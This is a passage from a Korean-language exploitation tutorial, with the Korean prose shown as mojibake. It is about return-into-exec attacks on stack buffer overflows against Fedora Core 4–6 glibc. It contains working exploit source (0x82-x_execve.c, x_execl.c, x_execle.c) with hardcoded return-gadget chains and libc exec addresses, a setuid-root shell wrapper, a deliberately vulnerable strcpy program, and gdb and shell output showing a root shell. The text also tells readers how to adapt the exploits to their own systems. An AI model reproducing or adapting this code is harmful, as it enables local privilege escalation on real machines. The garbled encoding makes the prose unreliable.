ÇÔ¼ö¸¦ È£ÃâÇÏ°í ÀÖÀ¸¸ç, execvp() ÇÔ¼ö ÁøÀÔ Á÷ÈÄ, %esp+4, execve() ÇÔ¼ö ÁøÀÔ Á÷Àü, ù ¹ø° ÀÎÀÚ°¡ Àý´ë °æ·ÎÀ̰ųª full path¸¦ °®´Â °æ¿ì, %esp+0x40 À§Ä¡¸¦ ÂüÁ¶ÇÏ¿© execve() ÇÔ¼öÀÇ Ã¹ ¹ø° ¸í·É ÀÎÀÚ¸¦ ¾ò¾î¿Â´Ù. ¹Ý¸é, execvp() ÇÔ¼öÀÇ Ã¹ ¹ø° ÀÎÀÚ¿¡ Àý´ë °æ·Î³ª full path¸¦ ÀÔ·ÂÇÏÁö ¾ÊÀº °æ¿ì, $PATH ȯ°æ º¯¼ö ³»¿ëÀ» ÂüÁ¶ÇÏ¿© execve() ÇÔ¼ö¸¦ ¿©·¯¹ø ¹Ýº¹ È£ÃâÇÑ´Ù. ¿¹Á¦ ÄÚµå: execvp("./sh",0); ¶Ç´Â, char *args[]={"sh","-c","ls",0}; execvp("sh",args); (½ÇÁ¦ exploit ½Ã, argument¸¦ Çڵ鸵 ÇÏÁö ¾Ê´Â sh ÇÁ·Î±×·¥À» ÁغñÇØµÎ¸é ¹®Á¦¾øÀÌ, shellÀ» ½ÇÇàÇÒ ¼ö ÀÖ´Ù.) ------------------------------------------------------------------------------------------------------ execvp() ÇÔ¼ö ÁøÀÔ Á÷ÈÄ, %esp+4 À§Ä¡ºÎÅÍ Ã¹ ¹ø° ÀÎÀÚ°¡ µé¾î°¨. ÇÔ¼ö ÇÁ·Ñ·Î±×°¡ Áö³­ ÈÄ, ~~~~~~~~~~~ 0x0019e5a0 : push %ebp 0x0019e5a1 : push %edi 0x0019e5a2 : push %esi 0x0019e5a3 : push %ebx 0x0019e5a4 : sub $0x2c,%esp execvp() ù ¹ø° ÀÎÀÚ°¡ full path ¶Ç´Â, Àý´ë °æ·Î·Î ÀԷµǾúÀ» °æ¿ì ´ÙÀ½ ÄÚµå ¼öÇàÀ» ÅëÇØ execve() ÇÔ¼ö¸¦ È£ÃâÇÑ´Ù. %esp+0x40 À§Ä¡¿¡ ¾Õ¼­ ¼³¸íÇÑ Ã¹ ¹ø° ÀÎÀÚ °ªÀÌ µé¾îÀÖ´Ù. ~~~~~~~~~~~~~~ 0x0019e5f1 : mov 0xfffffec0(%ebx),%eax 0x0019e5f7 : mov (%eax),%eax 0x0019e5f9 : mov %eax,0x8(%esp) <=== execve() ÇÔ¼ö ¼¼ ¹ø° ÀÎÀÚ 0x0019e5fd : mov 0x44(%esp),%ecx 0x0019e601 : mov %ecx,0x4(%esp) <=== execve() ÇÔ¼ö µÎ ¹ø° ÀÎÀÚ 0x0019e605 : mov 0x40(%esp),%eax 0x0019e609 : mov %eax,(%esp) <=== execve() ÇÔ¼ö ù ¹ø° ÀÎÀÚ 0x0019e60c : call 0x19e1ac ... Breakpoint 1, 0x007a25a0 in execvp () from /lib/libc.so.6 (gdb) x/x $esp <=== execvp()+0 ÁøÀÔ Á÷ÈÄ stack pointer 0xbfb7cd0c: 0x080483a7 (gdb) 0xbfb7cd10: 0x08048450 <=== execvp() ÇÔ¼ö ù ¹ø° ÀÎÀÚ (%esp+4 À§Ä¡) (gdb) 0xbfb7cd14: 0x00000000 <=== execvp() ÇÔ¼ö ù ¹ø° ÀÎÀÚ (%esp+8 À§Ä¡) (gdb) c Continuing. Breakpoint 2, 0x007a260c in execvp () from /lib/libc.so.6 (gdb) x/x $esp+0x40 <=== execve() ÇÔ¼ö¸¦ ºÎ¸£±â Á÷Àü stack pointer 0xbfb7cd10: 0x08048450 <=== execvp() ÇÔ¼ö ù ¹ø° ÀÎÀÚ (gdb) 0xbfb7cd14: 0x00000000 <=== execvp() ÇÔ¼ö ù ¹ø° ÀÎÀÚ (gdb) ------------------------------------------------------------------------------------------------------ 3-6) execve() ¶óÀ̺귯¸® ÇÔ¼ö ºÐ¼® execve() ÇÔ¼ö´Â ȯ°æ º¯¼ö¿Í ÇÔ²² ÀÎÀÚ¸¦ ¹è¿­ ÇüÅ·ΠÀü´ÞÇϸç, ½Ã½ºÅÛÄÝÀ» È£ÃâÇÏ´Â ¶óÀ̺귯¸® Á¦°ø ÇÔ¼öÀÌ´Ù. Ä¿³Î¿¡¼­ Á¦°øÇÏ´Â ½Ã½ºÅÛÄÝ ÇÔ¼ö´Â ¼ÒÇÁÆ®¿þ¾î ÀÎÅÍ·´Æ®¸¦ ÅëÇØ °¢ ·¹Áö½ºÅÍ¿¡ ÀÖ´Â ÀÎÀÚ °ªÀ» ÂüÁ¶ÇÏ¿© ¸í·ÉÀ» ½ÇÇàÇÑ´Ù. execve() ÁøÀÔ Á÷ÈÄ, %esp+0x4, ¼ÒÇÁÆ®¿þ¾î ÀÎÅÍ·´Æ® Á÷Àü, %esp+0xc À§Ä¡¸¦ ÂüÁ¶ÇÏ¿© ÇÔ¼öÀÇ Ã¹ ¹ø° ¸í·É ÀÎÀÚ¸¦ ¾ò¾î¿À¸ç, %ebx, %ecx, %edx ¼ø¼­·Î ÀÎÀÚ¸¦ ÀúÀåÇÏ°í ÀÎÅÍ·´Æ®ÇÑ´Ù. ¿¹Á¦ ÄÚµå: execve("./sh",0,0); ¶Ç´Â, char *args[]={"sh","-c","ls",0}; execve("/bin/sh",args,env); (½ÇÁ¦ exploit ½Ã, argument¸¦ Çڵ鸵 ÇÏÁö ¾Ê´Â sh ÇÁ·Î±×·¥À» ÁغñÇØµÎ¸é ¹®Á¦¾øÀÌ, shellÀ» ½ÇÇàÇÒ ¼ö ÀÖ´Ù.) ------------------------------------------------------------------------------------------------------ execve() ÇÔ¼ö ÁøÀÔ Á÷ÈÄ, %esp+4 À§Ä¡ºÎÅÍ Ã¹ ¹ø° ÀÎÀÚ°¡ µé¾î°¨. ÇÔ¼ö ÇÁ·Ñ·Î±×°¡ Áö³­ ÈÄ, ~~~~~~~~~~~ 0x007a21ac : push %edi 0x007a21ad : push %ebx ÀÌ ÁöÁ¡À¸·Î ¿À¸é, %esp+0xc À§Ä¡¿¡ ¾Õ¼­ ¼³¸íÇÑ Ã¹ ¹ø° ÀÎÀÚ °ªÀÌ µé¾îÀÖÀ½. ~~~~~~~~~~~~~ 0x007a21b9 : mov 0xc(%esp),%edi <=== execve() ÇÔ¼ö ù ¹ø° ÀÎÀÚ 0x007a21bd : mov 0x10(%esp),%ecx <=== execve() ÇÔ¼ö µÎ ¹ø° ÀÎÀÚ 0x007a21c1 : mov 0x14(%esp),%edx <=== execve() ÇÔ¼ö ¼¼ ¹ø° ÀÎÀÚ 0x007a21c5 : xchg %ebx,%edi 0x007a21c7 : mov $0xb,%eax 0x007a21cc : call *%gs:0x10 ... Breakpoint 1, 0x007a21ac in execve () from /lib/libc.so.6 (gdb) x/x $esp <=== execve()+0 ÁøÀÔ Á÷ÈÄ stack pointer 0xbf99878c: 0x080483a9 (gdb) 0xbf998790: 0x08048454 <=== execve() ÇÔ¼ö ù ¹ø° ÀÎÀÚ (%esp+4 À§Ä¡) (gdb) 0xbf998794: 0x00000000 <=== execve() ÇÔ¼ö µÎ ¹ø° ÀÎÀÚ (%esp+8 À§Ä¡) (gdb) 0xbf998798: 0x00000000 <=== execve() ÇÔ¼ö ¼¼ ¹ø° ÀÎÀÚ (%esp+12 À§Ä¡) (gdb) c Continuing. Breakpoint 2, 0x007a21cc in execve () from /lib/libc.so.6 (gdb) x/x $esp+0x0c 0xbf998790: 0x08048454 <=== execve() ÇÔ¼ö ù ¹ø° ÀÎÀÚ (gdb) 0xbf998794: 0x00000000 <=== execve() ÇÔ¼ö µÎ ¹ø° ÀÎÀÚ (gdb) 0xbf998798: 0x00000000 <=== execve() ÇÔ¼ö ¼¼ ¹ø° ÀÎÀÚ (gdb) ------------------------------------------------------------------------------------------------------ Áö±Ý±îÁö ¾à°£Àº Áö°Ü¿î µíÇÑ exec °è¿­ ÇÔ¼ö ºÐ¼®À» Çغ¸¾Ò´Ù. Ư¡À» Á¾ÇÕÇغ¸¸é, ÇÔ¼ö ³»ºÎ¿¡¼­ ´ëºÎºÐ execve() ¶óÀ̺귯¸® ÇÔ¼ö¸¦ È£ÃâÇÏ°í ÀÖ°í, ¸í·É ÀÎÀÚ¸¦ %esp+4 À§Ä¡¿¡¼­ Àоî¿Â´Ù´Â Á¡ÀÌ´Ù. ´ÜÁö ÀÎÀÚ Àü´Þ ÇüÅÂ¿Í È¯°æ º¯¼ö ÁöÁ¤ ¿©ºÎÀÇ Â÷ÀÌÀÏ »Ó, ´ëºÎºÐ ºñ½ÁÇÑ ±¸Á¶·Î È£ÃâµÇ°í ÀÖÀ½À» ¾Ë ¼ö ÀÖ¾ú´Ù. 4) local exploit ½ÃÇè ±×·¸´Ù¸é, ÀÌÁ¦ ºÐ¼®µÈ ³»¿ëµéÀ» Åä´ë·Î local exploitÀ» ÀÛ¼ºÇغ¸µµ·Ï ÇÏ°Ú´Ù. ¾î¶² ÇÔ¼ö¸¦ ÅÃÇÏ´ø payload´Â ´ÙÀ½°ú °°À» °ÍÀÌ´Ù. ¸ÕÀú, execve()¿Í °°Àº ȯ°æ º¯¼ö ±¸¼ºÀÌ °¡´ÉÇÑ ÇÔ¼ö¸¦ È£ÃâÇÏ¿© °¢ ¸í·É ÀÎÀÚ¸¦ ÁöÁ¤ÇÒ ¼ö ÀÖµµ·Ï ÇÑ´Ù. ±× ÈÄ, ret Äڵ带 ÀÌ¿ëÇÏ¿©, %esp ·¹Áö½ºÅ͸¦ ¾Õ¼­ ÁöÁ¤ÇÑ È¯°æ º¯¼ö Æ÷ÀÎÅÍ°¡ ÀÖ´Â ÀÚ¸®±îÁö À̵¿½ÃŲ ÈÄ exec °è¿­ ÇÔ¼ö¸¦ È£ÃâÇϵµ·Ï ÇÑ´Ù. ´ÙÀ½Àº execve() ÇÔ¼ö·Î °ø°ÝÇÏ´Â payload ¿¹Á¦ÀÌ´Ù. ------------------------------------------------------------------------------------------------------ ȯ°æ º¯¼ö ±¸¼º: +------------------+ | "./sh" |: execve() ÇÔ¼öÀÇ Ã¹ ¹ø° ÀÎÀÚ°¡ µÊ +------------------+ | '\0' |: execve() ÇÔ¼öÀÇ µÎ ¹ø° ÀÎÀÚ°¡ µÊ +------------------+ | '\0' |: execve() ÇÔ¼öÀÇ ¼¼ ¹ø° ÀÎÀÚ°¡ µÊ +------------------+ | '\0' | +------------------+ | '\0' | +------------------+ | '\0' | +------------------+ payload ±¸¼º: ÀÌÁ¦ ¿ì¸®´Â execve() ÇÔ¼ö¸¦ ȯ°æ º¯¼ö Æ÷ÀÎÅÍ 8byte ÀÌÀü À§Ä¡¿¡ µÎ±â¸¸ ÇÏ¸é µÈ´Ù. ±×·¯¸é, execve() ÇÔ¼ö°¡ È£ÃâµÇ¸é¼­ %esp ·¹Áö½ºÅÍ + 4byte À§Ä¡¸¦ ±âÁØÀ¸·Î ¿ì¸®°¡ ±¸¼ºÇØÁÖ¾ú´ø ù ¹ø° ȯ°æ º¯¼ö "./sh" °ªÀ» execve() ÇÔ¼öÀÇ Ã¹ ¹ø° ÀÎÀÚ·Î ÀνÄÇÑ´Ù. ^ | ½ºÅÃÀÌ Ä¿Áö´Â ¹æÇâ ... +------------------+ | buffer |: overflow µÇ´Â Áö¿ª º¯¼ö +------------------+ | ret(pop %eip) |: 4byte¾¿ %esp À̵¿ +------------------+ | ret(pop %eip) | +------------------+ | ret(pop %eip) | +------------------+ | ret(pop %eip) | +------------------+ | ... | +------------------+ | execve() ÇÔ¼ö |: ȯ°æ º¯¼ö Æ÷ÀÎÅÍ - 8byte À§Ä¡ +------------------+ | null(0x00000000) |: argument pointer ³¡ ºÎºÐ. +------------------+ | environ0 pointer |: ȯ°æ º¯¼ö "./sh" Æ÷ÀÎÅÍ ºÎºÐÀ¸·Î, execve() ÇÔ¼öÀÇ Ã¹ ¹ø° ÀÎÀÚ°¡ µÊ +------------------+ | environ1 pointer |: ȯ°æ º¯¼ö null Æ÷ÀÎÅÍ ºÎºÐÀ¸·Î, execve() ÇÔ¼öÀÇ µÎ ¹ø° ÀÎÀÚ°¡ µÊ +------------------+ | environ2 pointer |: ȯ°æ º¯¼ö null Æ÷ÀÎÅÍ ºÎºÐÀ¸·Î, execve() ÇÔ¼öÀÇ ¼¼ ¹ø° ÀÎÀÚ°¡ µÊ +------------------+ ... | ÁÖ¼Ò°¡ Ä¿Áö´Â ¹æÇâ V ------------------------------------------------------------------------------------------------------ exploit ½Ã, ȯ°æ º¯¼ö Æ÷ÀÎÅ͸¦ »ç¿ëÇÏ´Â ÀÌÀ¯´Â °£´ÜÇÏ´Ù. Ãë¾à ÇÁ·Î±×·¥ ±¸Á¶¿Í »ó°ü¾øÀÌ exploit ÀÛ¼ºÀÌ Æí¸®Çϱ⠶§¹®ÀÌ´Ù. ´Ù¸¸, debug ½Ã¿¡´Â ¸î °¡Áö ºÒÆíÇÔÀÌ µû¸¦ ¼ö ÀÖ´Ù. ±×·¡¼­ argument Æ÷ÀÎÅ͸¦ ÀÌ¿ëÇÏ¿© debugging ½ÃÇèÀ» ÇÏ°í, ½ÇÁ¦ exploitÀ» ÀÛ¼ºÇÒ ¶§´Â °Å¸®¸¦ Á¶Á¤ÇÏ¿© ȯ°æ º¯¼ö Æ÷ÀÎÅÍ·Î °ø°ÝÀ» ½ÃµµÇÒ ¼ö ÀÖ´Ù. ±×·³, ÀÌÁ¦ ½ÇÁ¦ °ø°Ý Äڵ带 »ìÆ캸µµ·Ï ÇÏÀÚ. execve() ÇÔ¼ö¸¦ ÅëÇØ °ø°ÝÇÏ°í ÀÖÀ¸¸ç, Ãë¾à ÇÁ·Î±×·¥ÀÇ È¯°æ º¯¼ö¸¦ Çڵ鸵Çϱâ À§ÇØ execve() ÇÔ¼ö¸¦ »ç¿ëÇÏ°í ÀÖ´Ù. ȯ°æ º¯¼ö¿¡ null Äڵ带 5°³ ÀÔ·ÂÇÑ ÀÌÀ¯´Â °£´ÜÇÏ´Ù. ù ¹ø° ȯ°æ º¯¼ö Æ÷ÀÎÅÍ "./sh"¸¦ Áö³ª¼­, µÎ ¹ø° ȯ°æ º¯¼ö Æ÷ÀÎÅÍ´Â 0x00000000 4byteÀÇ null °ªÀ» °¡Á®¾ß ÇÑ´Ù. ±×·¸±â ¶§¹®¿¡ null code 4byte¸¦ ¿¬¼ÓÇؼ­ ÀÔ·ÂÇÑ °ÍÀÌ´Ù. ±× ´ÙÀ½ ¼¼ ¹ø° ȯ°æ º¯¼ö Æ÷ÀÎÅÍ °ª ¿ª½Ã 0x00000000 4byteÀÇ null code¸¦ °¡Á®¾ß ÇϹǷÎ, null code 1byte¸¦ ´õ ÀÔ·ÂÇÏ¿© ±× Á¶°ÇÀ» ¸¸Á·½ÃÄ×´Ù. ------------------------------------------------------------------------------------------------------ °ø°Ý ÄÚµå ½ÇÇà °á°ú: [root@localhost exec]# cat > vuln.c /* Proof-of-Concept code */ #include int main(int argc,char *argv[]) { char buf[8]; strcpy(buf,argv[1]); return 0; } [root@localhost exec]# gcc -o vuln vuln.c [root@localhost exec]# cat > sh.c int main() { setuid(0); setgid(0); execl("/bin/sh","sh","-p",0); } [root@localhost exec]# gcc -o sh sh.c [root@localhost exec]# cat > 0x82-x_execve.c /* 0x82-x_execve.c */ int main() { char *environs[]={ "./sh", /* environ0: ./sh */ "\x00", /* environ1: 0x00000000 */ "\x00", /* environ2: 0x00000000 */ "\x00", /* environ3 */ "\x00", /* environ4 */ "\x00", /* environ5 */ 0}; /* ** execve()'s argument: ** -- ** execve("./sh",[null code pointer],[null code pointer]); */ char *arguments[]={ "./vuln", /* argument0 */ /* argument1 */ "\xb6\x83\x04\x08\xb6\x83\x04\x08\xb6\x83\x04\x08\xb6\x83\x04\x08" "\xb6\x83\x04\x08\xb6\x83\x04\x08\xb6\x83\x04\x08\xb6\x83\x04\x08" "\xb6\x83\x04\x08\xb6\x83\x04\x08\xb6\x83\x04\x08\xb6\x83\x04\x08" "\xb6\x83\x04\x08\xb6\x83\x04\x08\xb6\x83\x04\x08\xb6\x83\x04\x08" "\xb6\x83\x04\x08\xb6\x83\x04\x08\xb6\x83\x04\x08\xb6\x83\x04\x08" "\xb6\x83\x04\x08\xb6\x83\x04\x08\xb6\x83\x04\x08\xb6\x83\x04\x08" "\xb6\x83\x04\x08\xb6\x83\x04\x08\xb6\x83\x04\x08\xb6\x83\x04\x08" "\xb6\x83\x04\x08\xb6\x83\x04\x08\xb6\x83\x04\x08\xb6\x83\x04\x08" "\xb6\x83\x04\x08\xb6\x83\x04\x08\xb6\x83\x04\x08\xb6\x83\x04\x08" "\xb6\x83\x04\x08\xb6\x83\x04\x08" /* ret code number: 38 */ "\xac\x21\x7a", /* execve() */ 0}; execve("./vuln",arguments,environs); } [root@localhost exec]# gcc -o x_execve x_execve.c [root@localhost exec]# ./x_execve sh-3.00# exit exit [root@localhost exec]# gdb µð¹ö±ë °á°ú: [root@localhost exec]# gdb x_execve -q (no debugging symbols found) Using host libthread_db library "/lib/libthread_db.so.1". (gdb) r Starting program: /tmp/x_execve Reading symbols from shared object read from target memory...(no debugging symbols found)...done. Loaded system supplied DSO at 0x2a2000 (no debugging symbols found) (no debugging symbols found) Program received signal SIGSEGV, Segmentation fault. 0x00000000 in ?? () (gdb) x/7x $esp 0xbf9fde80: 0xbf9fffeb 0xbf9ffff0 0xbf9ffff1 0xbf9ffff2 0xbf9fde90: 0xbf9ffff3 0xbf9ffff4 0x00000000 (gdb) x/s 0xbf9fffeb 0xbf9fffeb: "./sh" <=== execve() ÇÔ¼öÀÇ Ã¹ ¹ø° ÀÎÀÚ°¡ µÊ. (gdb) x/x 0xbf9ffff0 0xbf9ffff0: 0x00000000 <=== execve() ÇÔ¼öÀÇ µÎ ¹ø° ÀÎÀÚ°¡ µÊ. (gdb) x/x 0xbf9ffff1 0xbf9ffff1: 0x00000000 <=== execve() ÇÔ¼öÀÇ ¼¼ ¹ø° ÀÎÀÚ°¡ µÊ. (gdb) execve() ÇÔ¼ö°¡ È£ÃâµÉ ¶§, ÀÎÀÚ´Â ´ÙÀ½°ú °°ÀÌ ³Ö¾îÁú °ÍÀÌ´Ù. Âü°í·Î, µÎ ¹ø° ÀÎÀÚ¿Í ¼¼ ¹ø° ÀÎÀÚ´Â null code¸¦ Æ÷ÀÎÅÍÇÏ°í ÀÖ´Ù. ¶ÇÇÑ, argument Æ÷ÀÎÅ͸¦ ÀÌ¿ëÇÏ¿©, µÎ ¹ø° ÀÎÀÚ¿Í ¼¼ ¹ø° ÀÎÀÚ¿¡ Á÷Á¢ null code¸¦ ³Ö¾îÁ־ °ø°Ý¿¡ ¼º°øÇÒ ¼ö ÀÖ´Ù. execve("./sh",0xbf9ffff0,0xbf9ffff1); ¶Ç´Â, execve("./sh",0x00000000,0x00000000); ------------------------------------------------------------------------------------------------------ À§ °á°ú¿Í °°ÀÌ %esp ·¹Áö½ºÅ͸¦ ¹Ì¸® ±¸¼ºÇÑ È¯°æ º¯¼ö Æ÷ÀÎÅͱîÁö ¿Å±æ ¼ö ÀÖ´Ù. Áö¿ª º¯¼ö°¡ argument Æ÷ÀÎÅÍ, ȯ°æ º¯¼ö Æ÷ÀÎÅÍ¿Í °¡±õ´Ù¸é, ÀÌ°ÍÀº ÃæºÐÈ÷ °¡´ÉÇÏ´Ù. »Ó¸¸¾Æ´Ï¶ó, ¾Õ¼­ exec °è¿­ ÇÔ¼ö ºÐ¼® ³»¿ë°ú °°ÀÌ execve() ÇÔ¼ö »Ó ¾Æ´Ñ ¸ðµç exec °è¿­ ÇÔ¼ö¸¦ ÀÌ¿ëÇÏ¿© °ø°ÝÇÒ ¼ö ÀÖ´Ù. ³ª¸ÓÁö °ø°Ý ÄÚµå´Â º°Ã· Äڵ忡 ÷ºÎÇϵµ·Ï ÇÏ°Ú´Ù. 5) real exploit ³ª´Â ¾ÆÁ÷±îÁö ÀÌ ¹æ¹ýÀ» ½ÇÁ¦ application exploit¿¡ Àû¿ëÇغ¸Áö ¸øÇß´Ù. ±×°ÍÀº Ç×»ó ÁøÇàµÇ°í ÀÖÀ¸´Ï, ¿©·¯ºÐµéÀÌ ÀÌ ¹®¼­¸¦ ÀÐÀ» ¶§ ÂëÀ̸é, ÇØ´ç Ãë¾àÁ¡ exploit code¸¦ °³¹ßÇÏ°í ÀÖÀ»Áöµµ ¸ð¸¥´Ù. ´õ ÀÚ¼¼ÇÑ »çÇ×ÀÌ ÇÊ¿äÇÏ´Ù¸é, ¸ÞÀÏ ÁÖ±æ ¹Ù¶õ´Ù. 6) °á·Ð Áö±Ý±îÁö ¼³¸íÇÑ °ø°Ý ±â¹ýÀº Fedora core 4 ½Ã½ºÅÛ ºÎÅÍ ÃֽŠFedora core 6±îÁö ÇØ´çµÇ´Â ³»¿ëÀÌ´Ù. ¾Æ·¡ µû·Î ÷ºÎÇÑ º°Ã· ÄÚµå´Â ÀÌµé ½Ã½ºÅÛ¿¡¼­ ½ÃÇèµÇ°í °ËÁõµÈ ³»¿ëÀÌ´Ù. ¹®¼­´Â Fedora core 4 ½Ã½ºÅÛ¿¡¼­ ½ÃÇèÇÑ ³»¿ëÀ» ´ã°í ÀÖÁö¸¸, º°Ã· ÄÚµå exploitÀº ÃֽŠFedora core 6±îÁö ½ÃÇèÇغ¸¾ÒÀ¸´Ï, ¿©·¯ºÐµéÀÇ ½Ã½ºÅÛ¿¡ ¸Â°Ô ¼öÁ¤ÇÑ ÈÄ »ç¿ëÇÏ¸é º° ¹®Á¦ ¾øÀÌ °ø°Ý¿¡ ¼º°øÇÒ ¼ö ÀÖÀ» °ÍÀÌ´Ù. 7) º°Ã· ÄÚµå ¾Æ·¡ º°Ã· ÄÚµåµéÀº Fedora core 4¿¡¼­ ½ÃÇèµÈ °ÍµéÀ̸ç, ret code °¹¼ö¿Í °¢ exec °è¿­ ÇÔ¼ö ÁÖ¼Ò¸¸ º¯°æÇØÁÖ¸é Fedora core 5,6 ½Ã½ºÅÛ¿¡¼­µµ µ¿ÀÏÇÑ ±¸Á¶·Î exploit ÇÒ ¼ö ÀÖ´Ù. Fedora core 4 ½Ã½ºÅÛÀÇ °æ¿ì, ret code¸¦ 38¹ø ÀÔ·ÂÇÑ °á°ú °ø°Ý¿¡ ¼º°øÇÒ ¼ö ÀÖ¾úÀ¸¸ç, Fedora core 6 ½Ã½ºÅÛÀÇ °æ¿ì, ret code¸¦ 46¹ø ÀÔ·ÂÇÑ °á°ú, °ø°ÝÀ» ¼º°ø½Ãų ¼ö ÀÖ¾ú´Ù. 7-1) Ãë¾àÁ¡ °ø°Ý ´ë»ó ÇÁ·Î±×·¥ code: vuln.c ÄÄÆÄÀÏ: gcc -o vuln vuln.c ------------------------------------------------------------------------------------------------------ /* Proof-of-Concept code */ #include int main(int argc,char *argv[]) { char buf[8]; strcpy(buf,argv[1]); return 0; } ------------------------------------------------------------------------------------------------------ 7-2) exploit¿¡¼­ ½ÇÇàÇÒ shell ÇÁ·Î±×·¥ code: sh.c ÄÄÆÄÀÏ gcc -o sh sh.c ------------------------------------------------------------------------------------------------------ int main() { setuid(0); setgid(0); execl("/bin/sh","sh","-p",0); } ------------------------------------------------------------------------------------------------------ 7-3) execl() ÇÔ¼ö¸¦ ÀÌ¿ëÇÑ local exploit code: 0x82-x_execl.c "/bin/ls -al" ¸í·ÉÀÌ Á¤»óÀûÀ¸·Î ½ÇÇàµÇ¸é, °ø°ÝÀº ¼º°øÇÑ °ÍÀÌ´Ù. ȯ°æ º¯¼ö·Î µé¾î°¡´Â ¸í·É, ÀÎÀÚ´Â Á÷Á¢ ¼öÁ¤ÇØÁ൵ µÈ´Ù. ¾Õ¼­ ¼Ò°³ÇÑ 7-2) sh ÇÁ·Î±×·¥ µµ¿ò¾øÀÌ ¸í·É ÀÎÀÚ±îÁö ÁöÁ¤ÇÏ¿© ½ÇÇà °¡´ÉÇÑ ºñ±³Àû ±ò²ûÇÑ(?) exploit code ÀÌ´Ù. ÄÄÆÄÀÏ: gcc -o 0x82-x_execl 0x82-x_execl.c ------------------------------------------------------------------------------------------------------ /* 0x82-x_execl.c */ int main() { char *environs[]={ "/bin/ls", /* environ0: /bin/ls */ "ls", /* environ1: ls */ "-al", /* environ2: -al */ 0}; /* execl("/bin/ls","ls","-al",0); */ char *arguments[]={ "./vuln", /* argument0 */ /* argument1 */ "\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08" "\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08" "\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08" "\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08" "\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08" "\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08" "\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08" "\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08" "\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08" "\x96\x82\x04\x08\x96\x82\x04\x08" /* ret code number: 38 */ "\x5c\x24\x7a", /* execl() */ 0}; execve("./vuln",arguments,environs); } ------------------------------------------------------------------------------------------------------ 7-4) execle() ÇÔ¼ö¸¦ ÀÌ¿ëÇÑ local exploit code: 0x82-x_execle.c ¾Õ¼­ ¼Ò°³ÇÑ 7-2) sh ÇÁ·Î±×·¥À» ÀÌ¿ëÇÏ´Â °ø°Ý ÄÚµå·Î½á, ƯÀÌÇÑ Á¡Àº ȯ°æ º¯¼ö Æ÷ÀÎÅÍ°¡ ¾Æ´Ñ, argument Æ÷ÀÎÅ͸¦ ÀÌ¿ëÇÏ¿© °ø°ÝÇÑ´Ù´Â Á¡ÀÌ´Ù. ÀÌ·¸°Ô argument Æ÷ÀÎÅÍ·Î °ø°ÝÇÏ´Â ÀÌÀ¯´Â execle() ÇÔ¼öÀÇ µÎ ¹ø° ÀÎÀÚ¿Í ¼¼ ¹ø° ÀÎÀÚ¿¡ null(0x00000000) °ªÀ» ÀÔ·ÂÇϱâ À§Çؼ­ÀÌ´Ù. ÀÌ°ÍÀº execv*() °è¿­ ÇÔ¼öÀÇ null code¸¦ Æ÷ÀÎÅÍÇÏ´Â ÁÖ¼Ò¸¦ ³Ö¾îÁÖ´Â °Í°ú ´Þ¸®, Á÷Á¢ null(0x00000000) °ªÀ» °®´Â Äڵ带 ÀÔ·ÂÇØÁÖ¾î¾ß ÇÑ´Ù. ÀÌ·¸°Ô ¿¬¼ÓµÇ´Â null(0x00000000) °ªÀ» ¸¸µé±â À§ÇØ argument Æ÷ÀÎÅÍ ³¡ ºÎºÐ°ú ȯ°æ º¯¼ö Æ÷ÀÎÅÍ ³¡ ºÎºÐÀÇ null code¸¦ ÀÌ¿ëÇÏ¿´´Ù. ÄÄÆÄÀÏ: gcc -o 0x82-x_execle 0x82-x_execle.c ------------------------------------------------------------------------------------------------------ /* 0x82-x_execle.c */ /* execle()´Â execv*() °è¿­°ú ´Ù¸£°Ô Æ÷ÀÎÅÍ°¡ ¾Æ´Ñ, NULL Äڵ带 Á÷Á¢ ÀÔ·ÂÇØÁÖ¾î¾ß ÇÑ´Ù. */ int main() { char *environs[]={0}; /* execle() ¼¼ ¹ø° ÀÎÀÚ: 0x00000000 */ char *arguments[]={ "./vuln", /* argument0 */ /* argument1 */ "\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08" "\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08" "\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08" "\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08" "\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08" "\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08" "\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08" "\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08" "\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08\x96\x82\x04\x08" "\x96\x82\x04\x08" /* ret code number: 37 */ "\x08\x23\x7a", /* execle() */ "./sh", /* execle() ù ¹ø° ÀÎÀÚ: ./sh */ 0}; /* execle() µÎ ¹ø° ÀÎÀÚ: 0x00000000 */ /* execle("./sh",0x00000000,0x00000000); */ execve("./vuln",arguments,environs); } ------------------------------------------------------------------------------------------------------ 7-5) execlp() ÇÔ¼ö¸¦ ÀÌ¿ëÇÑ local exploit code: 0x82-x_execlp.c "/bin/ls -al" ¸í·ÉÀÌ Á¤»óÀûÀ¸·Î ½ÇÇàµÇ¸é, °ø°ÝÀº ¼º°øÇÑ °ÍÀÌ´Ù. ȯ°æ º¯¼ö·Î µé¾î°¡´Â ¸í·É, ÀÎÀÚ´Â Á÷Á¢ ¼öÁ¤ÇØÁ൵ µÈ´Ù. ¾Õ¼­ ¼Ò°³ÇÑ 7-2) sh ÇÁ·Î±×·¥ µµ¿ò¾øÀÌ ¸í·É ÀÎÀÚ±îÁö ÁöÁ¤ÇÏ¿© ½ÇÇà °¡´ÉÇÑ ºñ±³Àû ±ò²ûÇÑ(?) exploit code ÀÌ´Ù. exploit method´Â execl() ÇÔ¼ö »ç¿ë 